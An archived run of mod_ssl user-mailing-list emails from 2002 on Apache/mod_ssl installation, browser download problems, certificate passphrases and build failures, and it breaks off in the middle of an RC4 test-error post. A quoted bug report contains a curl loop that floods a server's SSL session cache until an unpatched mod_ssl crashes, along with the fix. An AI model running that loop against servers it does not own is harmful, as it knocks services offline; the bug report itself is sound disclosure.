Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from correo.telnor.com id SAA27775; Fri, 22 Nov 2002 18:49:25 +0100 (MET)
Received: from telnor.com (jume.telnor.com [147.15.81.198])
	by correo.telnor.com (8.9.1/8.9.1) with ESMTP id JAA16256;
	Fri, 22 Nov 2002 09:51:22 -0800 (PST)
Message-ID: <3DDE6E90.3010301@telnor.com>
Date: Fri, 22 Nov 2002 09:51:12 -0800
From: =?ISO-8859-1?Q?Julio_C=E9sar_Mejia_Vergara?= 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org, garcia@ensino.net
Subject: Re: =?ISO-8859-1?Q?can=B4t_configure_mod=5Fssl?=
References: <002801c29220$866e9cc0$07020b0a@DOMAIN>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Julio_C=E9sar_Mejia_Vergara?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Que tal Gilberto,

Hay te va.

Saludos
Julio Mejia
TELNOR
Tijuana-Baja California-México.

DESCRIPCION: Pasos para instalar Apache 1.3.19 con ModSSL 2.8.1 para 
Apache 1.3.19.

Paso 1: Tener previamente instalado el compilador de C (GNUgcc 2.95.2) 
, 
y la utileria make (GNUmake 2.78.1) 
 
de GNU, además Perl 5.6.0 
, 
el JDK 1.3 
,  
OpenSSL 0.9.6 
 
(puedes buscar la versión más nueva de ModSSL enwww.modssl.org 
) y las bibliotecas de memoria virtual MM 1.1.3. 


Paso 2: Crear el directorio temporal en donde se va a colocar el 
software a instalar de modssl y apache.

#mkdir /trayectoria/temp

Paso 3: Copiar el software a instalar a los directorios temporales creados.

#cp mod_ssl-2.8.1-1.3.19.tar /trayectoria/temp
#cp apache_1.3.19.tar /trayectoria/temp

Paso 4: Desempaquetar el software de instalación de ModSSL y Apache.

#cd /trayectoria/temp
#tar -xvf mod_ssl-2.8.1-1.3.19.tar
#cd /trayectoria/temp
#tar -xvf apache_1.3.19.tar

Paso 5: Crear el directorio en donde se va a instalar el Apache.

#cd /usr/local
#mkdir apache

Paso 6: Introducir las siguientes variables de ambiente en el archivo 
.profile bajo root "/", si el archivo no existe crearlo

# vi .profile
#
# @(#)local.profile 1.6 98/02/06 SMI
#
stty istrip
PATH=.:/usr/local/bin:/usr/java/bin:/bin:/usr/ccs/bin:/usr/local/ssl/bin:/usr/local/apache/bin:$PATH
LD_LIBRARY_PATH=/usr/local/lib:/lib:/usr/lib:/usr/local/ssl/lib:$LD_LIBRARY_PATH
MANPATH=/usr/local/man:/usr/man:$MANPATH
CLASSPATH=/opt/JSDK2.0/lib/jsdk.jar
JAVA_HOME=/usr/java
export PATH  LD_LIBRARY_PATH MANPATH CLASSPATH JAVA_HOME

#
# If possible, start the windows system
#
if [ "`tty`" = "/dev/console" ] ; then
        if [ "$TERM" = "sun" -o "$TERM" = "AT386" ] ; then

                if [ ${OPENWINHOME:-""} = "" ] ; then
                        OPENWINHOME=/usr/openwin
                        export OPENWINHOME
                fi

                echo ""
                echo "Starting OpenWindows in 5 seconds (type Control-C 
to interrupt)"
                sleep 5
                echo ""
                $OPENWINHOME/bin/openwin

                clear # get rid of annoying cursor rectangle
                exit # logout after leaving windows system

        fi
fi

Paso 7: El archivo de configuración de modssl va a instalar el modulo de 
SSL en Apache y lo va a instalar, por lo consecuente ejecutar el 
siguiente comando de instalación desde modssl.

#cd /trayectoria/temp/mod_ssl-2.8.1-1.3.19
#./configure --with-apache=../apache_1.3.19 --with-ssl=../opensll-0.9.6 
--with-mm=../mm-1.1.3 --prefix=/usr/local/apache --enable-module=ssl 
--enable-module=so --enable-shared=max --enable-rule=SHARED_CORE 
--enable-rule=EAPI
#cd /trayectoria/temp/apache_1.3.19
#make
#make certificate TYPE=test
Signature Algorithm ((R)SA or (D)SA) [R]: R
Country Name (2 letter code): MX
State or Province Name (full name): Baja California
Locality Name (eg, City): Tijuana
Organization Name (eg, company): Telefonos del Noroeste S.A. de C.V.
Organizational Unit Name (eg, section): Sistemas
Common Name (eg, FQDN): nombre_maquina.telnor.com
Email Address (eg, name@FQDN ): jume@telnor.com 

Certificate Validity (days): 365
Certificate Version (1 or 3): 3
Encrrypt the private key now? [Y/n]: Y
Enter PEM pass phrase: xxxxxxxx
Verifying password - Enter PEM pass phrase: xxxxxxxx
#make install
#

Paso 8: Editar el archivo de configuración del apache y levanta el 
servidor con ssl.

#cd  /usr/local/apache/conf
#vi httpd.conf
configura archivo!!
#cd ../bin
#apachectl startssl
pass phrase: xxxxxxxx
apache started.
#

Para parar el apache utiliza:

#apachectl stop
#



Gilberto Garcia Jr. wrote:

> Hey guys,
>  
> Can someone explain me how configure mod_ssl on apchache web server? I 
> have installed apache with mod_ssl on a red hat 7.3
>  
> thanks
>  



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 22:11:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA04217; Fri, 22 Nov 2002 22:10:34 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from celery.onware.ca id WAA04200; Fri, 22 Nov 2002 22:09:16 +0100 (MET)
Received: from corsucant.onware.ca (unknown [142.179.203.42])
	by celery.onware.ca (Postfix) with ESMTP id E61C63FA2C
	for ; Fri, 22 Nov 2002 13:52:12 -0700 (MST)
Date: Fri, 22 Nov 2002 14:09:22 -0700 (MST)
From: Ian Moon 
To: modssl-users@modssl.org
Subject: apache, https, ie downloading pdf's word docs etc...
In-Reply-To: <200211221827.TAA28954@opensource.ee.ethz.ch>
Message-ID: <20021122135725.K18574-100000@coruscant.onware.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Moon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I can download pdf's and doc files no problem using mozilla using
both http and https, but I can only access them with http when using
ie 6.

I have tried all of the suggestions at ..
	http://www.modssl.org/docs/2.8/ssl_faq.html#ToC49

and scoured the groups and web for other things to try but none
have been successfull.

Running: Apache 1.3.27, mod_ssl 2.8.11,

Any suggestions or other readings would be greatly appreciated.

____________________
Ian Moon


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 22:52:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA05752; Fri, 22 Nov 2002 22:51:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mercury.pricegrabber.com id WAA05745; Fri, 22 Nov 2002 22:51:04 +0100 (MET)
Received: from wednesday.noc.pricegrabber.com (wednesday.noc.pricegrabber.com [192.168.9.1])
	(authenticated bits=0)
	by mercury.pricegrabber.com (8.12.6/8.12.6) with ESMTP id gAMLovtJ011096
	for ; Fri, 22 Nov 2002 13:50:57 -0800
Subject: Re: apache, https, ie downloading pdf's word docs etc...
From: Christopher McCrory 
To: modssl-users@modssl.org
In-Reply-To: <20021122135725.K18574-100000@coruscant.onware.ca>
References: <20021122135725.K18574-100000@coruscant.onware.ca>
Content-Type: text/plain
Organization: Pricegrabber
Message-Id: <1038001915.10365.14.camel@wednesday.noc.pricegrabber.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.0 (1.2.0-1) 
Date: 22 Nov 2002 13:51:56 -0800
Content-Transfer-Encoding: 7bit
X-RAVMilter-Version: 8.3.3(snapshot 20020312) (mercury.pricegrabber.com)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher McCrory 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello...

Do you have a  section that contains:

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

then have a:

 ServerName www.example.com
 DocumentRoot /SOME/PATH


? ? ?


If so try adding the 'SetEnvIf' the the www.example.com virtualhost
entry. Does it work?  I posted that this was a bug several days ago, but
it could just be me.





On Fri, 2002-11-22 at 13:09, Ian Moon wrote:
> I can download pdf's and doc files no problem using mozilla using
> both http and https, but I can only access them with http when using
> ie 6.
> 
> I have tried all of the suggestions at ..
> 	http://www.modssl.org/docs/2.8/ssl_faq.html#ToC49
> 
> and scoured the groups and web for other things to try but none
> have been successfull.
> 
> Running: Apache 1.3.27, mod_ssl 2.8.11,
> 
> Any suggestions or other readings would be greatly appreciated.
> 
> ____________________
> Ian Moon
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-- 
Christopher McCrory
 "The guy that keeps the servers running"

chrismcc@pricegrabber.com
 http://www.pricegrabber.com

Let's face it, there's no Hollow Earth, no robots, and 
no 'mute rays.' And even if there were, waxed paper is 
no defense.  I tried it.  Only tinfoil works.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 22:58:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA05930; Fri, 22 Nov 2002 22:57:20 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dbsiserver.micron.net id WAA05925; Fri, 22 Nov 2002 22:56:53 +0100 (MET)
Received: by DBSISERVER with Internet Mail Service (5.5.2653.19)
	id ; Fri, 22 Nov 2002 14:56:56 -0700
Message-ID: <11FE00AA8C43D311ABE3000629B0CB48139890@DBSISERVER>
From: Justin Kay 
To: "'modssl-users@modssl.org'" 
Subject: Private Key not found
Date: Fri, 22 Nov 2002 14:56:55 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Justin Kay 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am working on a new installation of Slackware 8.1.  I am trying to get the
mod_ssl working.  I have generated the key and crt files but when I try to
startssl I get an error that the Private Key not found and it doesn't start.
I am stumped.  Any ideas where to start?

Justin 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 22 23:12:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA06420; Fri, 22 Nov 2002 23:11:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.csusb.edu id XAA06399; Fri, 22 Nov 2002 23:10:21 +0100 (MET)
Received: from rmcgee.csusb.edu (rmcgee.csusb.edu [139.182.16.32])
	by mail.csusb.edu (8.12.5/8.12.5) with ESMTP id gAMM6j8t015794
	for ; Fri, 22 Nov 2002 14:06:45 -0800 (PST)
Message-Id: <5.1.1.6.0.20021122140222.00b909b0@mail.csusb.edu>
X-Sender: rmcgee@mail.csusb.edu
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Fri, 22 Nov 2002 14:10:19 -0800
To: modssl-users@modssl.org
From: Rich McGee 
Subject: Problem: Mod_SSL and flex -Pssl_expr_yy -s -B ssl_expr_scan.l
  on Solaris 2.9
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rich McGee 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm attempting to build Apache 1.3.27 on a new Solaris 2.9 system. I am 
following "Option 2" in the INSTALL of the mod_ssl-2.8.12-1.3.27, and I'm 
stumped.

After I configure and make (using gcc) all the required components (Both 
with and without mm) the make of the Apache server itself stops at:
flex -Pssl_expr_yy -s -B ssl_expr_scan.l

The CPU jumps to 99%, no error is generated, but this command never 
finishes. I've let it run for two days now, rebuilt the distribution from 
scratch, etc.

Any suggestions? If I build Apache without the SSL option, it works fine.

(No, I can't use Apache 2.0, the modules I will eventually have to link 
into it aren't yet supported by it)

Rich McGee
CSU San Bernardino

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 23 01:11:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA11709; Sat, 23 Nov 2002 01:10:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from celery.onware.ca id BAA11689; Sat, 23 Nov 2002 01:09:04 +0100 (MET)
Received: from corsucant.onware.ca (unknown [142.179.203.42])
	by celery.onware.ca (Postfix) with ESMTP id BAB663FA2C
	for ; Fri, 22 Nov 2002 16:51:51 -0700 (MST)
Date: Fri, 22 Nov 2002 17:09:00 -0700 (MST)
From: Ian Moon 
To: modssl-users@modssl.org
Subject: Re: apache, https, ie downloading pdf's word docs etc...
In-Reply-To: <1038001915.10365.14.camel@wednesday.noc.pricegrabber.com>
Message-ID: <20021122170557.J18972-100000@coruscant.onware.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Moon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I don't have the _default_:443 section...
instead I put the directives straight into my


ServerName foo

SetEnvIf ...



____________________
Ian Moon

On 22 Nov 2002, Christopher McCrory wrote:

> Hello...
>
> Do you have a  section that contains:
>
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>
> then have a:
> 
>  ServerName www.example.com
>  DocumentRoot /SOME/PATH
> 
>
> ? ? ?
>
>
> If so try adding the 'SetEnvIf' the the www.example.com virtualhost
> entry. Does it work?  I posted that this was a bug several days ago, but
> it could just be me.
>
>
>
>
>
> On Fri, 2002-11-22 at 13:09, Ian Moon wrote:
> > I can download pdf's and doc files no problem using mozilla using
> > both http and https, but I can only access them with http when using
> > ie 6.
> >
> > I have tried all of the suggestions at ..
> > 	http://www.modssl.org/docs/2.8/ssl_faq.html#ToC49
> >
> > and scoured the groups and web for other things to try but none
> > have been successfull.
> >
> > Running: Apache 1.3.27, mod_ssl 2.8.11,
> >
> > Any suggestions or other readings would be greatly appreciated.
> >
> > ____________________
> > Ian Moon
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> --
> Christopher McCrory
>  "The guy that keeps the servers running"
>
> chrismcc@pricegrabber.com
>  http://www.pricegrabber.com
>
> Let's face it, there's no Hollow Earth, no robots, and
> no 'mute rays.' And even if there were, waxed paper is
> no defense.  I tried it.  Only tinfoil works.
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 23 16:31:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA05104; Sat, 23 Nov 2002 16:30:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from honts307.wal-mart.com id QAA05031; Sat, 23 Nov 2002 16:29:44 +0100 (MET)
Received: from honts385.homeoffice.Wal-Mart.com (HONTS385 [161.173.132.67]) by honts307.wal-mart.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2656.59)
	id XH8025VH; Sat, 23 Nov 2002 09:33:48 -0600
Received: from honts342.homeoffice.wal-mart.com (unverified) by honts385.homeoffice.Wal-Mart.com
 (Content Technologies SMTPRS 4.2.10) with ESMTP id  for ;
 Sat, 23 Nov 2002 09:28:51 -0600
Received: by HONTS342.homeoffice.wal-mart.com with Internet Mail Service (5.5.2656.59)
	id ; Sat, 23 Nov 2002 09:28:51 -0600
Message-ID: 
From: Gary Stiek 
To: "'modssl-users@modssl.org'" 
Subject: RE: apache, https, ie downloading pdf's word docs etc...
Date: Sat, 23 Nov 2002 09:28:46 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Gary Stiek 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I don't know if you have tried this yet, so...

Make sure in IE that you have not disabled the downloading of documents from
secure web sites.  Under Internet Options/Advanced Options/Security there is
a checkbox for "Do not save encrypted pages to disk."  If this is enabled,
.pdf files ( and I think .doc files too ) will not display in IE from SSL
sites.

> -----Original Message-----
> From:	Ian Moon [SMTP:moon@onware.ca]
> Sent:	Friday, November 22, 2002 3:09 PM
> To:	modssl-users@modssl.org
> Subject:	apache, https, ie downloading pdf's word docs etc...
> 
> I can download pdf's and doc files no problem using mozilla using
> both http and https, but I can only access them with http when using
> ie 6.
> 
> I have tried all of the suggestions at ..
> 	http://www.modssl.org/docs/2.8/ssl_faq.html#ToC49
> 
> and scoured the groups and web for other things to try but none
> have been successfull.
> 
> Running: Apache 1.3.27, mod_ssl 2.8.11,
> 
> Any suggestions or other readings would be greatly appreciated.
> 
> ____________________
> Ian Moon
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


**********************************************************************
This email and any files transmitted with it are confidential
and intended solely for the individual or entity to 
whom they are addressed.  If you have received this email
in error destroy it immediately.
**********************************************************************
             Wal-Mart Stores, Inc. Confidential
**********************************************************************

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 23 19:33:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09916; Sat, 23 Nov 2002 19:32:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from coloradosprings.com id TAA09912; Sat, 23 Nov 2002 19:31:53 +0100 (MET)
From: "Erik Boles" 
To: "modssl" 
Subject: certificate problems
Date: Sat, 23 Nov 2002 11:37:09 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Erik Boles" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I apologize in advacne if this is off-topic for this list.

Just installed our new Verisign cert on our apache box but are having two
problems with it:

1. The person who generated the key that was sent to verisign used the wrong
common name so the secure URL we use doesn't match the URL on the cert,
throwing up a warning screen...any way around this other than starting over
with a new cert?


2. Whenever we start httpd we are promoted for a password for ssl to start,
which doesn't work for us as httpd restarts itself ever night.  Our old cert
never did this, is this something new?


Thanks for any help...

Erik


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Nov 23 19:55:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10671; Sat, 23 Nov 2002 19:54:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id TAA10661; Sat, 23 Nov 2002 19:53:06 +0100 (MET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 8CB2A2C407; Sat, 23 Nov 2002 10:44:42 -0800 (PST)
Date: Sat, 23 Nov 2002 10:44:42 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: certificate problems
Message-ID: <20021123184442.GA5213@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> Just installed our new Verisign cert on our apache box but are having two
> problems with it:
> 
> 1. The person who generated the key that was sent to verisign used the wrong
> common name so the secure URL we use doesn't match the URL on the cert,
> throwing up a warning screen...any way around this other than starting over
> with a new cert?
 
Unfortunately no, you will need to get a new one or move your secure pages to
that domain.


> 2. Whenever we start httpd we are promoted for a password for ssl to start,
> which doesn't work for us as httpd restarts itself ever night.  Our old cert
> never did this, is this something new?

The key is encrypted, so in case anyone broke into your server, the attacker
would not be able to simply take your certificate and key and impersonate you.
He would also need that passphrase.

The way of doing this is to decrypt the key :

# ./usr/local/ssl/install/bin/openssl rsa -in www.example.com.key \
    -out www.example.com.key.unsecure

(more info at http://www.apacheworld.org/ty24/site.chapter17.html)

mod_ssl also has a directive so you can have a script provide that phrase
automatically. It is convenient, but not really any more secure, see the
"How can I get rid of the pass-phrase dialog at Apache startup time?" entry at
http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html

Cheers

Daniel
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov 24 13:44:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA08619; Sun, 24 Nov 2002 13:43:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailserver.kippdata.de id NAA08613; Sun, 24 Nov 2002 13:42:48 +0100 (MET)
Received: from pfarr.kippdata.de ([195.227.30.175] (may be forged))
	by mailserver.kippdata.de (8.8.6/8.8.6) with ESMTP id NAA28062;
	Sun, 24 Nov 2002 13:45:35 +0100 (MET)
Message-Id: <5.1.1.6.0.20021124134140.01f40ec0@mailserver.kippdata.de>
X-Sender: jung@mailserver.kippdata.de
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Sun, 24 Nov 2002 13:48:47 +0100
To: modssl-users@modssl.org
From: Rainer Jung 
Subject: Re: A bug in table_adjust function that causes a core dump
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAA08616
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rainer Jung 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I would be very interested if there is any progress concerning this bug 
(table_adjust in ssl_util_table.c).

Are there plans to include the fix in the code? Has the bug been reproduced?

Also there was another Bug found some weeks ago concerning a memory leak 
when using client certificates. The bugfix obviously is now in the CVS 
tree. Does anyone know, when this code will be released (most liekely as 
2.8.13)?

Any answers would be very helpful, because we care about a site which is 
very soon starting to heavily use client certificates and also we observed 
a lot of apache processes core dumping on friday (not related to the 
certificates).

Best regards,

Rainer Jung

kippdata informationstechnologie GmbH
Bornheimer Straße 33a
D-53111 Bonn
Germany

Tel.: +49/228/98549-0
Fax:  +49/228/98549-50
email: rainer.jung@kippdata.de

At 16:26 08.11.02, you wrote:
>Hi folks,
>
>I have found a bug in table_adjust function, and I haven't seen any 
>reports about this error in the mailing list. Also, this error is not 
>fixed in the current version of mod_ssl (2.8.12).
>
>THE BUG
>-------------
>
>ssl_util_table.c file, line 1755:
>
>     buckets = (table_entry_t **) table_p->ta_calloc(buck_n, 
> sizeof(table_entry_t *));
>     if (table_p->ta_buckets == NULL)
>         return TABLE_ERROR_ALLOC;
>
>buckets variable is not checked here and this causes a coredump when the 
>table size is big and there is no memory for reallocating the buckets. 
>Below is a stack dump from Solaris 8 running Apache 1.3.26 + mod_ssl 
>2.8.10 + OpenSSL 0.9.6g:
>
>...
>  --- called from signal handler with signal 11 (SIGSEGV) ---
>00089b60 table_adjust (0, fe0a09cc, fe09ea84, 0, 3e9, fe08cdd8) + d0
>00081cac ssl_scache_shmht_expire (1, 20, fe0e436c, 4, 31, fe08e438) + 130
>00081a24 ssl_scache_shmht_store (94, 18aef0, 20, bb8200, bb81b8, 1ad4e0) + 11c
>0007b7e0 ssl_callback_NewSessionCacheEntry (bb8200, 3dc42bfb, 7b784, 
>1ad4e0, bb81b8, ba65e0) + 5c
>fe64c584 ssl_update_cache (a1c458, 2, 21c1, 1ad4e0, 1, a1c458) + a8
>fe63ef14 ssl3_accept (a1c458, 2100, 21c0, 3004, 90, 0) + 8c8
>fe64d520 SSL_accept (a1c458, fe63e64c, 1, ba1088, 10, ba109a) + 24
>fe648d94 ssl23_get_client_hello (2a, 70, 2, ffbef100, 1, a1c458) + 7cc
>fe648528 ssl23_accept (a1c458, fe648388, 1a1f70, 0, 6f757400, 6f757400) + 1a0
>fe64d520 SSL_accept (a1c458, 79d30, 12c, 0, 16fab0, 17cee0) + 24
>00079730 ssl_hook_NewConnection (908cc0, 178000, 1781d0, ffbef2cc, 16fa34, 
>806478) + 2b4
>0004c4a0 new_connection (163b1c, 45415049, 908cc0, ffbef344, ffbef344, 3) 
>+ 114
>0004d470 child_main (173400, 173400, 173400, ff36b228, ff365958, ff35efb8) 
>+ 634
>...
>
>HOW TO REPRODUCE
>----------------------------------
>
>I was able to reproduce the error in the following way:
>
>1. Set SSLSessionCacheTimeout to 20 minutes
>2. Set SSLSessionCache size to 1024000 (or a value that is close to your 
>EAPI_MM_CORE_MAXSIZE).
>3. Set ExtendedStatus to On
>4. Start the server and run a script like the following one:
>
>#!/usr/local/bin/bash
>
>i=0
>while expr $i \< 400 >/dev/null; do
>     echo $i
>     i=`expr $i + 1`
>
>     for j in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15; do
>         curl -I https://your.host/ &
>     done
>     sleep 1
>done
>
>BTW, you may interrupt the script when the "current sessions" parameter at 
>the bottom of the server status page (https://your.host/server-status) 
>have stopped growing.
>
>5. Wait 25 minutes from the time you have started the script and reload 
>the server status page or access the server over SSL. Most likely you will 
>see a core dump.
>
>THE FIX
>------------
>
>If we change the if statement like this:..
>
>     if (table_p->ta_buckets == NULL || buckets == NULL)
>         return TABLE_ERROR_ALLOC;
>
>...the server doesn't dump core in the test.
>
>Another solution to this problem is to decrease shared memory size in the 
>config file.
>
>Best regards,
>Kirill Shirokov,
>St. Petersburg, Russia.
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 25 04:31:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA01851; Mon, 25 Nov 2002 04:30:22 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imf07bis.bellsouth.net id EAA01783; Mon, 25 Nov 2002 04:29:50 +0100 (MET)
Received: from [216.78.241.135] by imf07bis.bellsouth.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021125033126.BMG19662.imf07bis.bellsouth.net@[216.78.241.135]>
          for ; Sun, 24 Nov 2002 22:31:26 -0500
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Sun, 24 Nov 2002 22:26:31 -0500
Subject: Make test errors in OS X
From: Randall Perry 
To: 
Message-ID: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Randall Perry 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Compiled openssl-0.9.6g ok under Mac OS 10.2.2. On make test all tests
passed until RC4 (errors below).

Anyone know what the problem is?




error calculating RC4
output: 75 b7 19 80 82 e0 c5 ef 00
expect: 75 b7 87 80 99 e0 c5 96 00
error calculating RC4
output: 74 94 5c e7 0b 4b 08 00 00
expect: 74 94 c2 e7 10 4b 08 79 00
error calculating RC4
output: 00 00 89 41 00 00 5d 3a 00
expect: de 18 89 41 a3 37 5d 3a 00
error calculating RC4
output: f1 64 41 a7 ec 3c 38 df bd 61 5a 11 53 e1 c7 18 36 ff 78 00 00
